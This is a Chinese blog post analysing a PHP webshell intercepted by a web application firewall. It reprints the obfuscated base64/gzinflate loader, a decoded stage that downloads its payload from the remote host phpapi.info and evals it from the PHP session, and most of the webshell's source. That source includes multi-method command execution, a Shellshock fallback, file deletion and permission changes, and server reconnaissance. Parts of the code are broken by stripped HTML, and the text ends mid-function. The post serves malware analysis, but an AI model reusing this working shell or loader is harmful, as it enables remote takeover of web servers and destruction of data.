miss枫
miss枫

【webshell分析】PHP大马分析

起因

今天通过WAF拦截到了一个有趣的PHP大马,随后简单进行了分析。
一开始看到这段代码,还以为是变形的一句话木马,但通过本地执行发现功能挺强大的。


$password='admin';//登录密码
//本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色:PHP高版本低版本都能执行,文件短小精悍,方便上传,功能强大,提权无痕迹,无视waf,过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。
$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'';*/

执行效果,竟然是个大马:
【webshell分析】PHP大马分析_第1张图片
为什么这么短的代码会有如此强大的功能呢?不由得分析了。

分析过程

1、解密

直接var_dump($html);发现这里用了PHP的gzinflate函数进行了压缩

gzinflate(base64_decode('lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8='))

再次解压缩并Base64解码:

发现原来是通过socket或curl远程读取服务器phpapi.info上的大马数据,有意思的一点是把大马数据保存在session中,而不是写到文件中,所以要根据代码查杀是不行的。只要服务器不清除session中的数据,大马就会一直存在。

error_reporting(0);
session_start();
if (!isset($_SESSION["phpapi"])) {
	$c = '';
	$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
	$url = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2THpRd05DNW5hV1k9Cg=="));
	$urlNew= base64_decode("LzBPbGlha1RIaXNQOGhwMGFkcGg5cGFwaTUrcjZlY2kwYTh5aWptZzlveGNwOWNrdmhmLw==");
	if (function_exists('fsockopen')) {
		$link = parse_url($url);
		$query = $link['path']; //404.gif
		$host = strtolower($link['host']); //phpapi.info
		$fp = fsockopen($host, 80, $errno, $errstr, 10);
		if ($fp) {
			$out = "GET /{$query} HTTP/1.0rn"; $out .= "Host: {$host}rn"; $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)rn"; $out .= "Connection: Closernrn"; //GET //404.gif HTTP/1.0rnHost: phpapi.infornUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)rnConnection: Closernrn
			fwrite($fp, $out); 
			$inheader = 1; 
			$contents = ""; 
			while (!feof($fp)) { $line = fgets($fp, 4096); 
			if ($inheader == 0) { $contents .= $line; } if ($inheader && ($line == "n" || $line == "rn")) { $inheader = 0; } } fclose($fp); $c = $contents; } } if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); $c = curl_exec($ch); curl_close($ch); } if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) { $temps = @file($url); if (!empty($temps)) $c = @implode('', $temps); if (!strpos($c, "delDirAndFile")) $c = @file_get_contents($url); } if (strpos($c, $urlNew) !== false) { $c = str_replace($urlNew, "", $c); $_SESSION["phpapi"] = gzinflate(base64_decode($c)); } } if (isset($_SESSION["phpapi"])) { eval($_SESSION["phpapi"]); }

dump出seesion中的大马数据


error_reporting(0);
date_default_timezone_set('UTC');
ob_start();
define('myaddress', $_SERVER['SCRIPT_FILENAME']);
define('postpass', $password);

function Exec_Run($cmd)
{
    $res = '';
    if (function_exists('exec')) {
        @exec($cmd, $res);
        $res = join("\n", $res);
    } elseif (function_exists('shell_exec')) {
        $res = @shell_exec($cmd);
    } elseif (function_exists('system')) {
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (@is_resource($f = @popen($cmd, 'r'))) {
        $res = '';
        while (!@feof($f)) {
            $res .= @fread($f, 1024);
        }
        @pclose($f);
    } elseif (substr(dirname($_SERVER["SCRIPT_FILENAME"]), 0, 1) != "/" && class_exists('COM')) {
        $w = new COM('WScript.shell');
        $e = $w->exec($cmd);
        $f = $e->StdOut();
        $res = $f->ReadAll();
    } elseif (function_exists('proc_open')) {
        $length = strcspn($cmd, " \t");
        $token = substr($cmd, 0, $length);
        if (isset($aliases[$token])) $cmd = $aliases[$token] . substr($cmd, $length);
        $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
        while (!feof($io[1])) {
            $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
        }
        while (!feof($io[2])) {
            $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
        }
        fclose($io[1]);
        fclose($io[2]);
        proc_close($p);
    } elseif (function_exists('mail')) {
        if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
            $tmp = tempnam(".", "data");
            putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
            mail("[email protected]", "", "", "", "-bv");
        } else $res = "Not vuln (not bash)";
        $output = @implode('', @file($tmp));
        @unlink($tmp);
        if ($output != "") $res = $output; else $res = "No output, or not vuln.";
    }
    return $res;
}

function css_img($img)
{
    $images = array(
        "exe" =>
            "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
            "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
            "xhIAOw==",
        "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
            "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
        "txt" =>
            "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
            "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
            "UpPWG3Ig6Hq/XmRjuZwkAAA7",
        "html" =>
            "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
            "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
            "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
            "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
            "ADs=",
        "js" =>
            "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
            "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
            "a00AjYYBbc/o9HjNniUAADs=",
        "xml" =>
            "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
            "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
            "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
            "IQA7",
        "mp3" =>
            "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
            "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
            "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
        "img" =>
            "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
            "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
            "FxEAOw==",
        "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
            "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
            "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
        "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" .
            "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
            "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
            "aNOmRcjVj02tPxPCzfkvIAA7"
    );
    header('Content-type: image/gif');
    echo base64_decode($images[$img]);
    die();
}

function css_showimg($file)
{
    $it = substr($file, -3);
    switch ($it) {
        case "jpg":
        case "gif":
        case "bmp":
        case "png":
        case "ico":
            return 'img';
            break;
        case "htm":
        case "tml":
            return 'html';
            break;
        case "exe":
        case "com":
            return 'exe';
            break;
        case "xml":
        case "doc":
            return 'xml';
            break;
        case ".js":
        case "vbs":
            return 'js';
            break;
        case "mp3":
        case "wma":
        case "wav":
        case "swf":
        case ".rm":
        case "avi":
        case "mp4":
        case "mvb":
            return 'mp3';
            break;
        case "rar":
        case "tar":
        case ".gz":
        case "zip":
        case "iso":
            return 'rar';
            break;
        default:
            return 'txt';
            break;
    }
}

function html_n($data)
{
    echo "$data\n";
}

function muma($filecode, $filetype)
{
    $dim = array(
        "php" => array("eval(", "exec("),
        "asp" => array("WScript.Shell", "execute(", "createtextfile("),
        "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
        "jsp" => array("runtime.exec(")
    );
    foreach ($dim[$filetype] as $code) {
        if (stristr($filecode, $code)) return true;
    }
}

function debug($file, $ftype)
{
    $type = explode('|', $ftype);
    foreach ($type as $i) {
        if (stristr($file, $i)) return true;
    }
}

function str_path($path)
{
    return str_replace('//', '/', $path);
}

function msg($msg)
{
    die("");
}

function uppath($nowpath)
{
    $nowpath = str_replace('\\', '/', dirname($nowpath));
    return urlencode($nowpath);
}

function html_ta($url, $name)
{
    html_n("$url\" target=\"_blank\">$name");
}

function html_a($url, $name, $where = '')
{
    html_n("$url\" $where>$name ");
}

function html_img($url)
{
    html_n("$url\" border=0>");
}

function back()
{
    html_n("");
}

function html_radio($namei, $namet, $v1, $v2)
{
    html_n('. $v1 . '" checked>' . $namei);
    html_n('. $v2 . '">' . $namet . '

');
}

function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
{
    if ($mode) {
        html_n("$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
    } else {
        html_n("$text $type\" name=\"$name\" value=\"$value\" size=\"$size\">");
    }
}

function html_text($name, $cols, $rows, $value = '')
{
    html_n("

");
}

function html_select($array, $mode = '', $change = '', $name = 'class')
{
    html_n("");
}

function html_font($color, $size, $name)
{
    html_n("$color\" size=\"$size\">$name");
}

function File_Str($string)
{
    return str_replace('//', '/', str_replace('\\', '/', $string));
}

function File_Write($filename, $filecode, $filemode)
{
    $key = true;
    $handle = @fopen($filename, $filemode);
    if (!@fwrite($handle, $filecode)) {
        @chmod($filename, 0666);
        $key = @fwrite($handle, $filecode) ? true : false;
    }
    @fclose($handle);
    return $key;
}
/*
function File_Mode()
{
    $RealPath = realpath('./');
    $SelfPath = $_SERVER['PHP_SELF'];
    $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
    return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
*/
function File_Mode()
{
    if (isset($_SERVER['DOCUMENT_ROOT'])) {
        return str_replace('//', '/', str_replace('\\', '/', $_SERVER['DOCUMENT_ROOT']));
    }
    $all=$_SERVER['SCRIPT_FILENAME'];
    $ban=$_SERVER['SCRIPT_NAME'];
    $file= basename($ban);
    $ban=substr($ban,0,strlen($ban) - strlen($file));
    if(substr($ban,-1)=="/")
        $ban=substr($ban,0,strlen($ban)-1);
    $ban= str_replace('//', '/', str_replace('\\', '/', $ban));
    $all= str_replace('//', '/', str_replace('\\', '/', $all));
    if($ban=="")
        $index= strripos($all,"/".$file);
    else
        $index= strripos($all,$ban);
    $all= substr($all,0,$index);
    return $all;
}

function GetFileOwner($File)
{
    if (PATH_SEPARATOR == ':') {
        if (function_exists('posix_getpwuid')) {
            $File = posix_getpwuid(fileowner($File));
        }
        return $File['name'];
    }
}

function GetFileGroup($File)
{
    if (PATH_SEPARATOR == ':') {
        if (function_exists('posix_getgrgid')) {
            $File = posix_getgrgid(filegroup($File));
        }
        return $File['name'];
    }
}

function File_Size($size)
{
    $kb = 1024;
    $mb = 1024 * $kb;
    $gb = 1024 * $mb;
    $tb = 1024 * $gb;
    $db = 1024 * $tb;
    if ($size < $kb) {
        return $size . " B";
    } else if ($size < $mb) {
        return round($size / $kb, 2) . " K";
    } else if ($size < $gb) {
        return round($size / $mb, 2) . " M";
    } else if ($size < $tb) {
        return round($size / $gb, 2) . " G";
    } else if ($size < $db) {
        return round($size / $tb, 2) . " T";
    } else {
        return round($size / $db, 2) . " ST";
    }
}

function File_Read($filename)
{
    $handle = @fopen($filename, "rb");
    $filecode = @fread($handle, @filesize($filename));
    @fclose($handle);
    return $filecode;
}

function array_iconv($data, $output = 'utf-8')
{
    $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'GB2312', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');
    $encoded = mb_detect_encoding($data, $encode_arr);

    if (!is_array($data)) {
        return mb_convert_encoding($data, $output, $encoded);
    } else {
        foreach ($data as $key => $val) {
            $key = array_iconv($key, $output);
            if (is_array($val)) {
                $data[$key] = array_iconv($val, $output);
            } else {
                $data[$key] = mb_convert_encoding($data, $output, $encoded);
            }
        }
        return $data;
    }
}

function Mysql_Len($data, $len)
{
    if (strlen($data) < $len) return $data;
    return substr_replace($data, '...', $len);
}

function css_js($num, $code = '')
{
    html_n('");
}

function css_left()
{
    $str = <<<end

end;
    html_n($str);
    $str = <<<end


end;
    html_n($str);
}

function css_main()
{
    $str = <<<end

	end;html_n($str);}functioncss_foot(){html_n("


    


 

    
");
}

function do_write($file, $t, $text)
{
    $key = true;
    $handle = @fopen($file, $t);
    if ($text != "") {
        if (!@fwrite($handle, $text)) {
            @chmod($file, 0666);
            $key = @fwrite($handle, $text) ? true : false;
        }
    }
    @fclose($handle);
    return $key;
}

function do_show($filepath)
{
    $show = array();
    $dir = dir($filepath);
    while ($file = $dir->read()) {
        if ($file == '.' or $file == '..') continue;
        $files = str_path($filepath . '/' . $file);
        $show[] = $files;
    }
    $dir->close();
    return $show;
}

function delDirAndFile($path)
{
    if (is_dir($path)) {
        $file_list = scandir($path);
        foreach ($file_list as $file) {
            if ($file != '.' && $file != '..') {
                delDirAndFile($path . '/' . $file);//递归删除
            }
        }
        @rmdir($path);//删除空目录
    } else if (is_file($path)) {
        @chmod($path, 0777);
        @unlink($path);//删除文件
    }
}

function GetHtml($url)
{
    $c = '';
    $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
    if (function_exists('fsockopen')) {
        $link = parse_url($url);
        $query = $link['path'] . '?' . $link['query'];
        $host = strtolower($link['host']);
        $port = $link['port'];
        if ($port == "") {
            $port = 80;
        }
        $fp = fsockopen($host, $port, $errno, $errstr, 10);
        if ($fp) {
            $out = "GET /{$query} HTTP/1.0\r\n";
            $out .= "Host: {$host}\r\n";
            $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            $inheader = 1;
            $contents = "";
            while (!feof($fp)) {
                $line = fgets($fp, 4096);
                if ($inheader == 0) {
                    $contents .= $line;
                }
                if ($inheader && ($line == "\n" || $line == "\r\n")) {
                    $inheader = 0;
                }
            }
            fclose($fp);
            $c = $contents;
        }
    }
    if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        $c = curl_exec($ch);
        curl_close($ch);
    }
    if (empty($c) && ini_get('allow_url_fopen')) {
        $c = implode('', @file($url));
        if (empty($c))
            $c = file_get_contents($url);
    }
    if (empty($c)) {
        echo "document.writeln(\"
$url\')\'>\");";
    }
    if (!empty($c)) {
        return $c;
    }
}

function do_showsql($query, $conn)
{
    $result = @mysql_query($query, $conn);
    html_n('



文件修改时间  . $FILE_TIME . "\" style=\"width:150px;\"> 以二进制形式保存文件(建议使用)



 . $pp . "';\" style=\"width:80px;\">

");
        break;
    case "rename":
        html_n("");
        $newname = urldecode($pp) . '/' . urlencode($_GET['newname']);
        @rename($p, $newname) ? html_a("?eanver=main&path=$pp", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]);
        die(" . $pp . '">');
        break;
    case "deltree":
        html_n("");
        delDirAndFile($p);
        !is_dir($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
        die(" . $pp . '">');
        break;
    case "del":
        html_n("");
        delDirAndFile($p);
        !is_file($p) ? html_a("?eanver=main&path=$pp", $p . ' ' . $msg[6]) : msg($msg[7]);
        die(" . $pp . '">');
        break;
    case "copy":
        html_n("");
        $newpath = explode('/', $_GET['newcopy']);
        $pathr[0] = $newpath[0];
        for ($i = 1; $i < count($newpath); $i++) {
            $pathr[] = urlencode($newpath[$i]);
        }
        $newcopy = implode('/', $pathr);
        @copy($p, $newcopy) ? html_a("?eanver=main&path=$pp", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
        die(" . $pp . '">');
        break;
    case "perm":
        html_n("
" . $p . " 属性为: ");
        if (is_dir($p)) {
            html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']);
        } else {
            html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']);
        }
        html_input("submit", "save", "修改");
        back();
        if ($_POST['class']) {
            switch ($_POST['class']) {
                case "0777":
                    $change = @chmod($p, 0777);
                    break;
                case "0755":
                    $change = @chmod($p, 0755);
                    break;
                case "0555":
                    $change = @chmod($p, 0555);
                    break;
                case "0666":
                    $change = @chmod($p, 0666);
                    break;
                case "0644":
                    $change = @chmod($p, 0644);
                    break;
                case "0444":
                    $change = @chmod($p, 0444);
                    break;
            }
            $change ? html_a("?eanver=main&path=$pp", $msg[4]) : msg($msg[5]);
            die(" . $pp . '">');
        }
        html_n("");
        break;
    case "info_f":
        $dis_func = get_cfg_var("disable_functions");
        $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
        if ($dis_func == "") {
            $dis_func = "No";
        } else {
            $dis_func = str_replace(" ", "
", $dis_func);
            $dis_func = str_replace(",", "
", $dis_func);
        }
        $phpinfo = (!preg_match("/phpinfo/", $dis_func)) ? "Yes" : "No";
        $info = array(array("服务器时间", date("Y-m-d h:i:s", time())), array("服务器域名", " . $_SERVER['SERVER_NAME'] . "\" target=\"_blank\">" . $_SERVER['SERVER_NAME'] . ""), array("服务器IP地址", gethostbyname($_SERVER['SERVER_NAME'])), array("服务器操作系统", PHP_OS), array("服务器操作系统文字编码", $_SERVER['HTTP_ACCEPT_LANGUAGE']), array("服务器解译引擎", $_SERVER['SERVER_SOFTWARE']), array("你的IP", get_proxy_ip()), array("Web服务端口", $_SERVER['SERVER_PORT']), array("PHP运行方式", strtoupper(php_sapi_name())), array("PHP版本", PHP_VERSION), array("运行于安全模式", Info_Cfg("safemode")), array("本文件路径", myaddress), array("允许使用 URL 打开文件 allow_url_fopen", Info_Cfg("allow_url_fopen")), array("允许使用curl_exec", Info_Fun("curl_exec")), array("允许动态加载链接库 enable_dl", Info_Cfg("enable_dl")), array("显示错误信息 display_errors", Info_Cfg("display_errors")), array("自动定义全局变量 register_globals", Info_Cfg("register_globals")), array("magic_quotes_gpc", Info_Cfg("magic_quotes_gpc")), array("程序最多允许使用内存量 memory_limit", Info_Cfg("memory_limit")), array("POST最大字节数 post_max_size", Info_Cfg("post_max_size")), array("允许最大上传文件 upload_max_filesize", $upsize), array("程序最长运行时间 max_execution_time", Info_Cfg("max_execution_time") . "秒"), array("被禁用的函数 disable_functions", $dis_func), array("phpinfo()", $phpinfo), array("目前还有空余空间diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'), array("图形处理 GD Library", Info_Fun("imageline")), array("IMAP电子邮件系统", Info_Fun("imap_close")), array("MySQL数据库", Info_Fun("mysql_close")), array("SyBase数据库", Info_Fun("sybase_close")), array("Oracle数据库", Info_Fun("ora_close")), array("Oracle 8 数据库", Info_Fun("OCILogOff")), array("PREL相容语法 PCRE", Info_Fun("preg_match")), array("PDF文档支持", Info_Fun("pdf_close")), array("Postgre SQL数据库", Info_Fun("pg_close")), array("SNMP网络管理协议", Info_Fun("snmpget")), array("压缩文件支持(Zlib)", Info_Fun("gzclose")), array("XML解析", Info_Fun("xml_set_object")), array("FTP", Info_Fun("ftp_login")), array("ODBC数据库连接", Info_Fun("odbc_close")), array("Session支持", Info_Fun("session_start")), array("Socket支持", Info_Fun("fsockopen")),);
        $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
